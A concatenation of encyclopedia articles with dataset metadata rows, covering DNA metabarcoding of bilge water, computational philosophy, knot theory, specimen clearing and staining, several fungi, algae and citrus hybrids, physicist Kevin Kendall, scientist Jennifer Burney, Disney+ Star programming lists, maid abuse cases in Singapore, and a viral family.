Recent studies have revealed that the water and associated debris entrained in bilge spaces of small vessels (<20 m) can act as a vector for the spread of NIS at regional scales. Bilge water is defined as any water that is retained on a vessel (other than ballast), and that is not deliberately pumped on board. It can accumulate on or below the vessel’s deck (e.g., under floor panels) through a variety of mechanisms, including wave actions, leaks, via the propeller stern glands, and through the loading of items such as diving, fishing, aquaculture or scientific equipment. Bilge water, therefore, may contain seawater as well as living organisms at various life stages, cell debris and contaminants (e.g., oil, dirt, detergent, etc.), all of which are usually discharged using automatic bilge pumps or are self-drained using duckbill valves. Bilge water pumped from small vessels (manually or automatically) is not usually treated prior to discharge to sea, contrasting with larger vessels that are required to separate oil and water using filtration systems, centrifugation, or carbon absorption. If propagules are viable through this process, the discharge of bilge water may result in the spread of NIS.
In 2017, Fletcher et al. used a combination of laboratory and field experiments to investigate the diversity, abundance, and survival of biological material contained in bilge water samples taken from small coastal vessels. Their laboratory experiment showed that ascidian colonies or fragments, and bryozoan larvae, can survive passage through an unfiltered pumping system largely unharmed. They also conducted the first morpho-molecular assessment (using eDNA metabarcoding) on the biosecurity risk posed by bilge water discharges from 30 small vessels (sailboats and motorboats) of various origins and sailing time. Using eDNA metabarcoding they characterised approximately three times more taxa than via traditional microscopic methods, including the detection of five species recognised as non-indigenous in the study region.
To assist in understanding the risks associated with different NIS introduction vectors, traditional microscope biodiversity assessments are increasingly being complemented by eDNA metabarcoding. This allows a wide range of diverse taxonomic assemblages, at many life stages to be identified. It can also enable the detection of NIS that may have been overlooked using traditional methods. Despite the great potential of eDNA metabarcoding tools for broad-scale taxonomic screening, a key challenge for eDNA in the context of environmental monitoring of marine pests, and particularly when monitoring enclosed environments such as some bilge spaces or ballast tanks, is differentiating dead and viable organisms. Extracellular DNA can persist in dark/cold environments for extended periods of time (months to years, thus many of the organisms detected using eDNA metabarcoding may have not been viable in the location of sample collection for days or weeks. In contrast, ribonucleic acid (RNA) deteriorates rapidly after cell death, likely providing a more accurate representation of viable communities. Recent metabarcoding studies have explored the use of co-extracted eDNA and eRNA molecules for monitoring benthic sediment samples around marine fish farms and oil drilling sites, and have collectively found slightly stronger correlations between biological and physico-chemical variables along impact gradients when using eRNA. From a marine biosecurity prospective, the detection of living NIS may represent a more serious and immediate threat than the detection of NIS based purely on a DNA signal. Environmental RNA may therefore offer a useful method for identifying living organisms in samples.
Miscellaneous
The construction of the genetic barcode library was initially focused on fish and birds, followed by butterflies and other invertebrates. In the case of birds, the DNA sample is usually obtained from the chest.
Researchers have already developed specific catalogs for large animal groups, such as bees, birds, mammals or fish. Another use is to analyze the complete zoocenosis of a given geographic area, such as the "Polar Life Bar Code" project that aims to collect the genetic traits of all organisms that live in polar regions; both poles of the Earth. Related to this form is the coding of all the ichthyofauna of a hydrographic basin, for example the one that began to develop in the Rio São Francisco, in the northeast of Brazil.
The potential of the use of Barcodes is very wide, since the discovery of numerous cryptic species (it has already yielded numerous positive results), the use in the identification of species at any stage of their life, the secure identification in cases of protected species that are illegally trafficked, etc.
It has also been used as a non-invasive tool to determine the diet of wildlife species, such as wombats and particularly critically endangered species, such as the northern hairy-nosed wombat (Lasiorhinus krefftii).
Potentials and shortcomings
Potentials
DNA barcoding has been proposed as a way to distinguish species suitable even for non-specialists to use.
Shortcomings
In general, the shortcomings for DNA barcoding are valid also for metabarcoding. One particular drawback for metabarcoding studies is that there is no consensus yet regarding the optimal experimental design and bioinformatics criteria to be applied in eDNA metabarcoding. However, there are current joined attempts, such as the COST network DNAqua-Net of the European Cooperation in Science and Technology, to move forward by exchanging experience and knowledge to establish best-practice standards for biomonitoring.
The so-called barcode is a region of mitochondrial DNA within the gene for cytochrome c oxidase. A database, Barcode of Life Data Systems (BOLD), contains DNA barcode sequences from over 190,000 species. However, scientists such as Rob DeSalle have expressed concern that classical taxonomy and DNA barcoding, which they consider a misnomer, need to be reconciled, as they delimit species differently. Genetic introgression mediated by endosymbionts and other vectors can further make barcodes ineffective in the identification of species.
Status of barcode species
In microbiology, genes can move freely even between distantly related bacteria, possibly extending to the whole bacterial domain. As a rule of thumb, microbiologists have assumed that kinds of Bacteria or Archaea with 16S ribosomal RNA gene sequences more similar than 97% to each other need to be checked by DNA-DNA hybridisation to decide if they belong to the same species or not. This concept was narrowed in 2006 to a similarity of 98.7%.
DNA-DNA hybridisation is outdated, and results have sometimes led to misleading conclusions about species, as with the pomarine and great skua. Modern approaches compare sequence similarity using computational methods.
See also
Barcode of Life Data System (BOLD)
Consortium for the Barcode of Life (CBOL)
International Nucleotide Sequence Database Collaboration (INSDC)
Molecular marker
Taxonomic impediment
References
Further references
Genetics organizations
DNA barcoding
Metagenomics | Metabarcoding | [
"Biology"
] | 6,228 | [
"Genetics techniques",
"Phylogenetics",
"Molecular genetics",
"DNA barcoding"
] |
66,620,086 | https://en.wikipedia.org/wiki/Computational%20philosophy | Computational philosophy or digital philosophy is the use of computational techniques in philosophy. It includes concepts such as computational models, algorithms, simulations, games, etc. that help in the research and teaching of philosophical concepts, as well as specialized online encyclopedias and graphical visualizations of relationships among philosophers and concepts. The use of computers in philosophy has gained momentum as computer power and the availability of data have increased greatly. This, along with the development of many new techniques that use those computers and data, has opened many new ways of doing philosophy that were not available before. It has also led to new insights in philosophy.
See also
Internet Encyclopedia of Philosophy
PhilPapers
Stanford Encyclopedia of Philosophy
References
External links
Centre for Digital Philosophy at the University of Western Ontario
PhiloComp.net at the University of Oxford
Philosophical methodology
Computational fields of study | Computational philosophy | [
"Technology"
] | 165 | [
"Computational fields of study",
"Computing and society"
] |
66,623,943 | https://en.wikipedia.org/wiki/Murasugi%20sum | In knot theory, a Murasugi sum is a way of combining the Seifert surfaces of two knots or links, given with embeddings in space of each knot and of a Seifert surface for each knot, to produce another Seifert surface of another knot or link. It was introduced by Kunio Murasugi, who used it to compute the genus and Alexander polynomials of certain alternating knots. When the two given Seifert surfaces have the minimum genus for their knot, the same is true for their Murasugi sum. However, the genus of non-minimal-genus Seifert surfaces does not behave as predictably under Murasugi sums.
References
Knot operations | Murasugi sum | [
"Mathematics"
] | 147 | [
"Topology stubs",
"Topology"
] |
66,624,528 | https://en.wikipedia.org/wiki/Diaphonization | Diaphonization (or diaphonisation), also known as clearing and staining, is a staining technique used on animal specimens that first renders the body of the animal transparent by bathing it in trypsin, and then stains the bones and cartilage with various dyes, usually alizarin red and alcian blue.
History
Diaphonization was first developed by O. Schultze in 1897, and later was modified by numerous researchers.
Technique
Clearing renders the animals transparent and is achieved by bathing the specimens in a soup of trypsin, a digestive enzyme that slowly breaks down flesh. The dyes alizarin red and alcian blue are most commonly used in the staining of bone and cartilage accordingly. When cleared, the specimen is put in glycerin. Despite its merits, diaphonization is not widely used in the scientific field. Advancements in imaging technology have rendered the practice all but obsolete, though it is expanding as an art form.
Diaphonization is not suitable for animals longer than 30 centimeters (except for snakes) due to the limited ability of the trypsin bath to penetrate the tissues of larger animals. It is usually used to preserve animals that are too delicate to dissect, and instead are kept as wet specimens.
References
Staining
Staining dyes
Scientific techniques
Laboratory techniques
Zoology
Skeletal system | Diaphonization | [
"Chemistry",
"Biology"
] | 278 | [
"Staining",
"Microbiology techniques",
"Zoology",
"nan",
"Microscopy",
"Cell imaging"
] |
66,628,588 | https://en.wikipedia.org/wiki/Phellinus%20lundellii | Phellinus lundellii is a species of fungus belonging to the family Hymenochaetaceae. It is found in Eurasia and North America.
References
lundellii
Fungi described in 1972
Fungi of Asia
Fungi of Europe
Fungi of North America
Fungus species | Phellinus lundellii | [
"Biology"
] | 54 | [
"Fungi",
"Fungus species"
] |
66,628,662 | https://en.wikipedia.org/wiki/Porodaedalea%20chrysoloma | Porodaedalea chrysoloma is a species of fungus belonging to the family Hymenochaetaceae. It is distributed across central Europe, also found in the south of Sweden, Norway and Finland.
P. chrysoloma can be found parasiting on Norway's Spruce, typically on the branches. It's considered a key species of the old growth boreal forests.
In Sweden, P. chrysoloma is classified as near threatened in the Swedish Red List due to the loss of its habitat.
Porodaedalea abietis, (also known as Porodaedalea laricis) is a sister species of Porodaedalea chryoloma. Their main morphological difference is in the hymenium pores. P. chrysoloma has elongated, daedaleois to laberyinthine irregular pores, while P. abietis has more regular, cylindrical and some elongated pores.
References
Hymenochaetaceae
Fungus species | Porodaedalea chrysoloma | [
"Biology"
] | 205 | [
"Fungi",
"Fungus species"
] |
66,628,903 | https://en.wikipedia.org/wiki/Scotinosphaera%20paradoxa | Scotinosphaera paradoxa is a species of alga belonging to the family Scotinosphaeraceae.
Synonym:
Kentrosphaera facciolaae Borzì, 1883
References
Ulvophyceae | Scotinosphaera paradoxa | [
"Biology"
] | 48 | [
"Algae stubs",
"Algae"
] |
66,631,533 | https://en.wikipedia.org/wiki/Kevin%20Kendall | Kevin Kendall FRS is a British physicist who received a London external BSc degree at Salford CAT in 1965 while working as an engineering apprentice at Joseph Lucas Gas Turbine Ltd. He became interested in surface science during his Ph.D. study in the Cavendish Laboratory and devised a novel method for measuring the true contact area between solids using an ultrasonic transmission. That led to new arguments about the adhesion of contacting solids, giving a theory of adhesion and fracture that applies to a wide range of problems of high industrial significance, especially in the chemical industry where fine particles stick together tenaciously. His book Crack Control published by Elsevier summarizes many of these applications.
Education
Kendall first went to school at St Edwards Darwen but when his mother Margaret died in 1950 the family moved to Accrington near his father Cyril's work at Joseph Lucas Gas Turbine Ltd. On passing the eleven plus exam at St Annes Accrington in 1955 he studied at St. Mary's College, Blackburn, completing his A levels in 1961. Cyril died in 1960 so Joseph Lucas offered Kevin a student apprenticeship in Physics at Salford CAT. His external degree followed in 1965, allowing him to do one year of R&D work on rocket modelling before leaving for Pembroke College Cambridge in October 1966. Three years of study at the Cavendish Laboratory in Free School Lane was successful in analyzing the transmission of ultrasonic waves through metal and other contacts. He received his Doctor of Philosophy from the University of Cambridge in 1970 under the supervision of David Tabor.
Career
In 1969, Kendall joined British Railways Research on London Road, Derby where the new Advanced Passenger Train (APT) was being developed, requiring industrial development of wheel-to-rail adhesion and corrosion problems. While studying the adhesion of nano-particles generated from corroding iron brake-block dust, he found that the standard pull-off testing methods gave large errors and published his first paper to show that crack theory must be used to analyze these adhesion measurements just as Griffith had postulated for glass-cracks in 1920. This coincided with a collaboration linking Ken Johnson and Alan Roberts in the Engineering Department at Cambridge University on the adhesion of elastic spheres. Roberts had performed experiments on the contact and surface attraction of optically smooth rubber spheres during his doctoral studies, while Johnson had solved the stress field problem twelve years earlier. But Johnson had not applied Griffith's energy-equilibrium condition. Kendall produced the mathematical answer in a couple of hours on 11 April 1970, fitting the experimental results reasonably well. The joint paper was published in 1971, one of the most highly cited papers in Royal Society Proceedings A.
This breakthrough in understanding adhesion problems allowed Kendall to take four years out of the industry, first at Monash University as QEII fellow from 1972 and then in Akron University during 1975 supervised by Alan Gent who co-founded the Adhesion Society in the USA during 1978 because of the widening applications of adhesive and composite materials. It was during this period from 1972 to 1975 that Kendall solved several long-standing problems of composite materials: Why are composites like Fiberglass tougher than the brittle components EG glass and polymer
How does a crack deflect along with a brittle interface
Strength of a lap joint does not exist; lap joints have been known for 5000 years but the solution to lap failure was only found in 1975The difficulty of industry R&D is that there is no time between inventing, patenting, and commercializing to analyze the science properly, so it was not until 1997 when Kendall took a sabbatical in Australia that he found the opportunity to summarize these findings in his first book 'The Sticky Universe'. Unfortunately, misapprehensions, errors, and anachronisms in science last for centuries and there has been little change in engineering courses and ASTM standards in this millennium to make necessary adjustments in faulty fracture text-books, as recounted in recent conferences that demonstrated 'strength of brittle materials' always varies with the size of the samples being tested and so has little meaning, overriding Galileo's original definition from 1638.
Kendall believed that industry was the main source of technological advancement and joined the Colloid & Interface Science Group at Imperial Chemical Industries (ICI) in Runcorn to invent new processes and materials. Several patents arose from his new process for mixing cement, using about 1% of polymer additive to make a novel low porosity product with ten times the strength of standard mortar and five times the toughness. This eventually led to improved ceramic processing giving better superconductors and fuel cells among numerous other applications. He and the ICI group received the Ambrose Congreve award for this invention because the energy crisis was intense and new low energy materials and processing were needed.
Another discovery in the 1970s was the limit of grinding fine particles in ball mills, a phenomenon that has been observed for millennia. When grinding limestone in a mill, the particles are reduced in size to a few micrometers, then go no finer. This limit was explained by studying cracks in smaller samples until the crack would fail to extend because plastic flow intervened.
Kendall was awarded the Adhesion Society award for excellence in 1998.
He returned to the industry after starting the spin-out company Adelan in 1996 and is CTO since 2021. The mission is to replace combustion with hydrogen-fuel-cell power generation to avoid climate crisis.
Research in Universities
During 1989, when ICI decided to focus its business on pharmaceuticals and drop its research in carbon fibers and other advanced materials, Kendall took early retirement and joined his long-time colleague Derek Birchall at Keele University collaborating with the ceramics institution Ceram Research in 1993. The patents on ceramic processing were used to develop new products, especially Solid Oxide Fuel Cells (SOFCs) that are expected to grow in market size to $1.4 bn by 2025. Kendall's invention of fine cell tubes allowed rapid start-up and led to many academic papers and two books that were highly cited. Kendall moved to the University of Birmingham in 2000 and built a substantial group in Chemical Engineering working on hydrogen and fuel cells. He and his colleagues, Prof. Dr. Bruno Georges Pollet and Dr Waldemar Bujalski opened the first UK green-hydrogen station refueling five fuel-cell-battery-taxis in 2008 and has continued since his retiring from teaching in 2011 to encourage city/industry leadership in clean-energy transport, not achievable by academics, linking with Asia where the growing car population nearing 1 billion is a desperate problem. He was first in showing that the hydrogen fuel cell vehicle used 50% less energy than a comparable combustion car. Meanwhile, Kendall was applying his adhesion ideas to cancer cells, viruses, and nano-particles. According to Google Scholar, his works have been cited on more than 27,000 occasions, unusual for an industrial researcher.
He was elected Fellow of the Royal Society in 1993. He continues to push forward the green hydrogen revolution, running a fleet of hydrogen-fuel-cell battery vehicles in the Birmingham Clean Air Zone.
References
External links
A public lecture by Prof. Kevin Kendall from University of Birmingham, UK
Fellows of the Royal Society
British mechanical engineers
Tribologists
Alumni of the University of Cambridge
Living people
Year of birth missing (living people) | Kevin Kendall | [
"Materials_science"
] | 1,470 | [
"Tribology",
"Tribologists"
] |
66,631,602 | https://en.wikipedia.org/wiki/List%20of%20Star%20%28Disney%2B%29%20original%20programming | Star is a hub within the Disney+ streaming service for television and film content intended for a general audience. The hub is available in a subset of countries where Disney+ operates. Programs released exclusively on Star are branded as "Star Originals". Content from Disney-owned networks such as Hulu, ABC and FX, along with other Disney-owned programming premiere exclusively on Star internationally. Star also produces original local content which is exclusively released on the platform.
Original programming
Drama
Comedy
Unscripted
Docuseries
Non-English language
Dutch
French
German
Italian
Japanese
Korean
Mandarin
Portuguese
Spanish
Turkish
Co-productions
Continuations
Original films
Feature films
Documentaries
Specials
Shorts
Exclusive international distribution
TV series
Drama
Comedy
Animation
Adult animation
Anime
Kids & family
Unscripted
Docuseries
Reality
Variety
Continuations
Non-English language
Indonesian
Japanese
Korean
Portuguese
Spanish
Other
Films
Feature films
Documentaries
Specials
Upcoming programming
Original programming
Drama
Unscripted
Docuseries
Non-English language
German
Japanese
Korean
Portuguese
Spanish
Other
Co-productions
Original films
Feature films
Documentaries
Exclusive international distribution
Drama
Comedy
See also
List of Hulu original programming
List of Hulu original films
List of Disney+ original programming
List of Disney+ original films
List of Star+ original programming, for the streaming service in Latin America
List of Disney+ Hotstar original programming, for the streaming service in India and Southeast Asia
List of Disney+ Hotstar original films
Notes
References
Internet-related lists
Lists of television series by network
Lists of television series by streaming service
Television lists
Lists of films by studio | List of Star (Disney+) original programming | [
"Technology"
] | 293 | [
"Computing-related lists",
"Internet-related lists"
] |
66,631,894 | https://en.wikipedia.org/wiki/Kinkoji%20unshiu | Kinkoji unshiu (Citrus obovoidea × unshiu) is a Citrus hybrid cultivated for its edible fruit.
Genetics
Kinkoji unshiu is a graft chimera between the kinkoji (Citrus obovoidea) and the satsuma mandarin (Citrus unshiu).
Distribution
It is cultivated and occurs naturally in Japan and is also grown in California.
Description
The fruit is moderately large (around the size of a grapefruit) and pomelo-like in shape. The rind is of a medium thickness (slightly thinner than that of a pomelo) and is pale to dark yellow in color. The flesh is bright orange in color and moderately seedy. The tree is densely branched and the leaves are leathery and ovate to elliptical in shape. The flesh is juicy and has been described as having a pleasant flavor but rather mild and flat. It has been cultivated for over 70 years.
See also
Kobayashi mikan
Japanese citrus
List of citrus fruits
References
Citrus
Citrus hybrids
Fruit trees
Edible fruits
Japanese fruit
Fruits originating in East Asia
Flora of Japan
Graft chimeras | Kinkoji unshiu | [
"Biology"
] | 230 | [
"Chimerism",
"Graft chimeras"
] |
66,634,027 | https://en.wikipedia.org/wiki/Kobayashi%20mikan | Kobayashi mikan (Citrus natsudaidai × unshiu) is a Citrus hybrid cultivated for its edible fruit.
Genetics
Kobayashi mikan is a graft chimera between an amanatsu (Citrus natsudaidai) and a satsuma mandarin (Citrus unshiu).
Distribution
It is cultivated and occurs naturally in Japan and is also grown in California.
Description
The fruit is small to medium in size and oblate to round in shape. The rind is mostly smooth but is normally slightly rough and is medium to bright orange in color. The flesh is dark orange and moderately seedy. The flavor is said to be tart. The tree is densely branched and has a broad crown, and the leaves are elliptical in shape. It has been cultivated for over 70 years.
See also
Kinkoji unshiu
Japanese citrus
List of citrus fruits
References
Citrus
Citrus hybrids
Fruit trees
Edible fruits
Japanese fruit
Fruits originating in East Asia
Oranges (fruit)
Graft chimeras | Kobayashi mikan | [
"Biology"
] | 201 | [
"Chimerism",
"Graft chimeras"
] |
66,634,066 | https://en.wikipedia.org/wiki/Chara%20baueri | Chara baueri is a species of alga belonging to the family Characeae.
It has almost cosmopolitan distribution.
References
Charophyta | Chara baueri | [
"Biology"
] | 30 | [
"Algae stubs",
"Algae"
] |
66,634,139 | https://en.wikipedia.org/wiki/Auriculariopsis%20albomellea | Auriculariopsis albomellea is a species of fungus belonging to the family Schizophyllaceae.
It is native to Eurasia.
References
Schizophyllaceae
Fungus species | Auriculariopsis albomellea | [
"Biology"
] | 43 | [
"Fungi",
"Fungus species"
] |
66,635,300 | https://en.wikipedia.org/wiki/Jennifer%20Burney | Jennifer Burney grew up in Albuquerque, New Mexico, and is now professor and the Marshall Saunders Chancellor's Endowed Chair in Global Climate Policy and Research at the University of California, San Diego, as part of the School of Global Policy and Strategy. She studied history and science at Harvard University and earned a PhD in physics from Stanford, developing a superconducting camera to capture images of cosmic bodies, like pulsars or exoplanets. After graduating, she worked for Solar Electric Light Fund on rural electrification, particularly in West Africa.
She worked as a postdoc, starting in 2008, at Stanford on food security and the environment. She was named a National Geographic Emerging Explorer in 2011. As a current research affiliate at the University of California, San Diego's Policy Design and Evaluation Laboratory, her research focuses mainly on global food security, adaptation, and climate change mitigation. Some projects she has worked on include rural electrification, aerosol emissions, and high-yield farming.
Her partner is Claire Adida, professor of political science at the University of California, San Diego. They have two children.
References
External links
21st-century American women scientists
Living people
21st-century American physicists
American LGBTQ academics
American LGBTQ scientists
LGBTQ people from California
Environmental scientists
Stanford University alumni
University of California, San Diego faculty
Harvard College alumni
Year of birth missing (living people)
LGBTQ physicists | Jennifer Burney | [
"Environmental_science"
] | 285 | [
"American environmental scientists",
"Environmental scientists"
] |
66,638,383 | https://en.wikipedia.org/wiki/Sequence%20covering%20map | In mathematics, specifically topology, a sequence covering map is any of a class of maps between topological spaces whose definitions all somehow relate sequences in the codomain with sequences in the domain. Examples include maps, , , and . These classes of maps are closely related to sequential spaces. If the domain and/or codomain have certain additional topological properties (often, the spaces being Hausdorff and first-countable is more than enough) then these definitions become equivalent to other well-known classes of maps, such as open maps or quotient maps, for example. In these situations, characterizations of such properties in terms of convergent sequences might provide benefits similar to those provided by, say for instance, the characterization of continuity in terms of sequential continuity or the characterization of compactness in terms of sequential compactness (whenever such characterizations hold).
Definitions
Preliminaries
A subset of is said to be if whenever a sequence in converges (in ) to some point that belongs to then that sequence is necessarily in (i.e. at most finitely many points in the sequence do not belong to ). The set of all sequentially open subsets of forms a topology on that is finer than 's given topology
By definition, is called a if
Given a sequence in and a point in if and only if in Moreover, is the topology on for which this characterization of sequence convergence in holds.
A map is called if is continuous, which happens if and only if for every sequence in and every if in then necessarily in
Every continuous map is sequentially continuous although in general, the converse may fail to hold.
In fact, a space is a sequential space if and only if it has the following :
for every topological space and every map the map is continuous if and only if it is sequentially continuous.
The in of a subset is the set consisting of all for which there exists a sequence in that converges to in
A subset is called in if which happens if and only if whenever a sequence in converges in to some point then necessarily
The space is called a if for every subset which happens if and only if every subspace of is a sequential space.
Every first-countable space is a Fréchet–Urysohn space and thus also a sequential space. All pseudometrizable spaces, metrizable spaces, and second-countable spaces are first-countable.
Sequence coverings
A sequence in a set is by definition a function whose value at is denoted by (although the usual notation used with functions, such as parentheses or composition might be used in certain situations to improve readability).
Statements such as "the sequence is injective" or "the image (i.e. range) of a sequence is infinite" as well as other terminology and notation that is defined for functions can thus be applied to sequences.
A sequence is said to be a of another sequence if there exists a strictly increasing map (possibly denoted by instead) such that for every where this condition can be expressed in terms of function composition as:
As usual, if is declared to be (such as by definition) a subsequence of then it should immediately be assumed that is strictly increasing.
The notation and mean that the sequence is valued in the set
The function is called a if for every convergent sequence in there exists a sequence such that
It is called a if for every there exists some such that every sequence that converges to in there exists a sequence such that and converges to in
It is a if is surjective and also for every and every every sequence and converges to in there exists a sequence such that and converges to in
A map is a if for every compact there exists some compact subset such that
Sequentially quotient mappings
In analogy with the definition of sequential continuity, a map is called a if
is a quotient map, which happens if and only if for any subset is sequentially open if and only if this is true of in
Sequentially quotient maps were introduced in who defined them as above.
Every sequentially quotient map is necessarily surjective and sequentially continuous although they may fail to be continuous.
If is a sequentially continuous surjection whose domain is a sequential space, then is a quotient map if and only if is a sequential space and is a sequentially quotient map.
Call a space if is a Hausdorff space.
In an analogous manner, a "sequential version" of every other separation axiom can be defined in terms of whether or not the space possess it.
Every Hausdorff space is necessarily sequentially Hausdorff. A sequential space is Hausdorff if and only if it is sequentially Hausdorff.
If is a sequentially continuous surjection then assuming that is sequentially Hausdorff, the following are equivalent:
is sequentially quotient.
Whenever is a convergent sequence in then there exists a convergent sequence in such that and is a subsequence of
Whenever is a convergent sequence in then there exists a convergent sequence in such that is a subsequence of
This statement differs from (2) above only in that there are no requirements placed on the limits of the sequences (which becomes an important difference only when is not sequentially Hausdorff).
If is a continuous surjection onto a sequentially compact space then this condition holds even if is not sequentially Hausdorff.
If the assumption that is sequentially Hausdorff were to be removed, then statement (2) would still imply the other two statement but the above characterization would no longer be guaranteed to hold (however, if points in the codomain were required to be sequentially closed then any sequentially quotient map would necessarily satisfy condition (3)).
This remains true even if the sequential continuity requirement on was strengthened to require (ordinary) continuity.
Instead of using the original definition, some authors define "sequentially quotient map" to mean a surjection that satisfies condition (2) or alternatively, condition (3). If the codomain is sequentially Hausdorff then these definitions differs from the original in the added requirement of continuity (rather than merely requiring sequential continuity).
The map is called if for every convergent sequence in such that is not eventually equal to the set is sequentially closed in where this set may also be described as:
Equivalently, is presequential if and only if for every convergent sequence in such that the set is sequentially closed in
A surjective map between Hausdorff spaces is sequentially quotient if and only if it is sequentially continuous and a presequential map.
Characterizations
If is a continuous surjection between two first-countable Hausdorff spaces then the following statements are true:
is almost open if and only if it is a 1-sequence covering.
An is surjective map with the property that for every there exists some such that is a for which by definition means that for every open neighborhood of is a neighborhood of in
is an open map if and only if it is a 2-sequence covering.
If is a compact covering map then is a quotient map.
The following are equivalent:
is a quotient map.
is a sequentially quotient map.
is a sequence covering.
is a pseudo-open map.
A map is called if for every and every open neighborhood of (meaning an open subset such that ), necessarily belongs to the interior (taken in ) of
and if in addition both and are separable metric spaces then to this list may be appended:
is a hereditarily quotient map.
Properties
The following is a sufficient condition for a continuous surjection to be sequentially open, which with additional assumptions, results in a characterization of open maps. Assume that is a continuous surjection from a regular space onto a Hausdorff space If the restriction is sequentially quotient for every open subset of then maps open subsets of to sequentially open subsets of
Consequently, if and are also sequential spaces, then is an open map if and only if is sequentially quotient (or equivalently, quotient) for every open subset of
Given an element in the codomain of a (not necessarily surjective) continuous function the following gives a sufficient condition for to belong to 's image: A family of subsets of a topological space is said to be at a point if there exists some open neighborhood of such that the set is finite.
Assume that is a continuous map between two Hausdorff first-countable spaces and let
If there exists a sequence in such that (1) and (2) there exists some such that is locally finite at then
The converse is true if there is no point at which is locally constant; that is, if there does not exist any non-empty open subset of on which restricts to a constant map.
Sufficient conditions
Suppose is a continuous open surjection from a first-countable space onto a Hausdorff space let be any non-empty subset, and let where denotes the closure of in
Then given any and any sequence in that converges to there exists a sequence in that converges to as well as a subsequence of such that for all
In short, this states that given a convergent sequence such that then for any other belonging to the same fiber as it is always possible to find a subsequence such that can be "lifted" by to a sequence that converges to
The following shows that under certain conditions, a map's fiber being a countable set is enough to guarantee the existence of a point of openness. If is a sequence covering from a Hausdorff sequential space onto a Hausdorff first-countable space and if is such that the fiber is a countable set, then there exists some such that is a point of openness for
Consequently, if is quotient map between two Hausdorff first-countable spaces and if every fiber of is countable, then is an almost open map and consequently, also a 1-sequence covering.
See also
Notes
Citations
References
Topological graph theory | Sequence covering map | [
"Mathematics"
] | 2,078 | [
"Mathematical relations",
"Topological graph theory",
"Topology",
"Graph theory"
] |
68,131,375 | https://en.wikipedia.org/wiki/Maid%20abuse | Maid abuse is the maltreatment or neglect of a person hired as a domestic worker, especially by the employer or by a household member of the employer. It is any act or failure to act that results in harm to that employee. It takes on numerous forms, including physical, sexual, emotional, and economic abuse. The majority of perpetrators tend to be female employers and their children. These acts may be committed for a variety of reasons, including to instil fear in the victim, discipline them, or act in a way desired by the abuser.
The United States Human Trafficking Hotline describes maid abuse as a form of human trafficking— it is "force, fraud, or coercion to maintain control over the worker and to cause the worker to believe that he or she has no other choice but to continue with the work," they stated. Although it can occur anywhere, it is most commonly experienced amongst domestic workers in Singapore.
Prevalence
Maid abuse, though a global phenomenon, is especially prevalent in Singapore. According to a study by Research Across Borders, six out of ten Singaporean domestic workers experience some form of abuse at work. One in four reported physical violence. Additionally, one in seven Singaporeans have witnessed maid abuse.
Foreign domestic workers, who have come to the country seeking employment, are at high risk of abuse. As maids are the only migrant workers not protected under the country's Singapore's Employment Act, many end up in abusive situations. This is amplified due to the fact that foreign domestic worker contracts in Singapore lack live-out options; foreign maids reside in the same residence as their employers. Mistreatment of Singaporean foreign domestic workers is not uncommon and is widely detailed. They are subject to physical abuse, invasion of privacy, and sexual assault (including rape).
Legislation
Singapore
In Singapore, it is against the law to abuse a foreign domestic worker. The Ministry of Manpower (MOM) says that perpetrators face severe penalties; if convicted, the perpetrator may face prison time, caning, or be fined as much as $20,000. The perpetrator will also be banned from further employment of foreign domestic workers.
Malaysia
In Malaysia, abused foreign domestic workers can obtain visas so that they may stay in the country to pursue legal complaints; the same is true in the United States.
Notable cases
On 2 December 2001, 19-year-old Indonesian maid Muawanatul Chasanah was found beaten to death in her house of employment in Chai Chee, Singapore. Her employer, Ng Hua Chye, was arrested and charged with her murder. It was revealed in Ng's 2-day trial that Ng had repeatedly punched, kicked and whipped the maid and even used burning cigarette butts and/or boiling hot water to burn the maid due to her supposed poor working performance and her stealing the food of Ng's infant daughter. He was sentenced to 18 years and six months in prison, along with 12 strokes of the cane.
On 28 May 2002, Indonesian maid Sundarti Supriyanto killed her employer Angie Ng and Ng's daughter Crystal Poh, and set fire to Ng's Bukit Merah office in Singapore. Sundarti recounted that she was severely abused by Ng for minor mistakes, and even starved for days by Ng. She had endured much humiliation before she finally lost her control and fatally stabbed Ng (and her daughter) in a frenzied attack. The High Court of Singapore accepted that she indeed suffered from maid abuse and was not of her right mind when she was gravely provoked into committing the crime and lost control; therefore they acquitted Sundarti of murder and instead sentenced her to life imprisonment for culpable homicide not amounting to murder.
On 26 July 2016, in Singapore, Myanmar maid Piang Ngaih Don was killed by her employer, 41-year-old Gaiyathiri Murugayan. Murugayan was sentenced to 30 years in prison on 22 June 2021. She had earlier pleaded guilty to 28 charges out of a total of 115 relating to the murder and abuse of the maid, who worked for her family for a few months. The murder charge was reduced to the next highest charge of culpable homicide as Gaiyathiri was suffering from a mental disorder at the time she murdered Piang, meaning she would not be sentenced to death (which was the mandatory penalty for murder in Singapore). The prosecution sought a life sentence for the convicted maid killer, and while judge See Kee Oon did not hand out a life term, he agreed by saying that the conduct of Gaiyathiri were an abhorrence and outrage to human and public conscience. Gaiyathiri's mother was given a 17-year jail term for maid abuse while Gayathiri's husband, who also abused the maid, is currently on trial since 2023.
On 25 June 2018, at a flat in Singapore’s Choa Chu Kang, 17-year-old Zin Mar Nwe, a foreign maid from Myanmar, used a knife to stab her employer’s mother-in-law 26 times, resulting in the death of the 70-year-old elderly Indian citizen. Zin Mar Nwe told police and the court that the victim had hit her and reprimanded her on several occasions, and the threat of being sent back to her home country caused her to be triggered and thus stabbed the elderly woman to death. Although Zin Mar Nwe was found guilty of murder nonetheless at the end of her trial on 18 May 2023, some of her claims of being abused by the victim were accepted by the trial court. She was sentenced to life imprisonment in July 2023.
See also
Domestic worker
References
Abuse
Crimes
Violence against women | Maid abuse | [
"Biology"
] | 1,166 | [
"Abuse",
"Behavior",
"Aggression",
"Human behavior"
] |
68,132,184 | https://en.wikipedia.org/wiki/Atkinsviridae | Atkinsviridae is a family of RNA viruses, which infect prokaryotes.
Taxonomy
Atkinsviridae contains 56 genera:
Andhevirus
Apihcavirus
Arihsbuvirus
Bahdevuvirus
Bilifuvirus
Blinduvirus
Cahtebovirus
Chinihovirus
Chounavirus
Cihsnivirus
Diydovirus
Dugnivirus
Firunevirus
Gohshovirus
Hehspivirus
Helacdivirus
Hirvovirus
Huhmpluvirus
Huleruivirus
Hysdruvirus
Ichonovirus
Ipivevirus
Isoihlovirus
Kempsvovirus
Kihrivirus
Kimihcavirus
Kudohovirus
Kuhfotivirus
Lahcomavirus
Lehptevirus
Lobdovirus
Madisduvirus
Mitdiwavirus
Moloevirus
Monekavirus
Nehujevirus
Neratovirus
Niginuvirus
Pagohnivirus
Pihngevirus
Pohlydovirus
Psoetuvirus
Qeihnovirus
Rainacovirus
Scloravirus
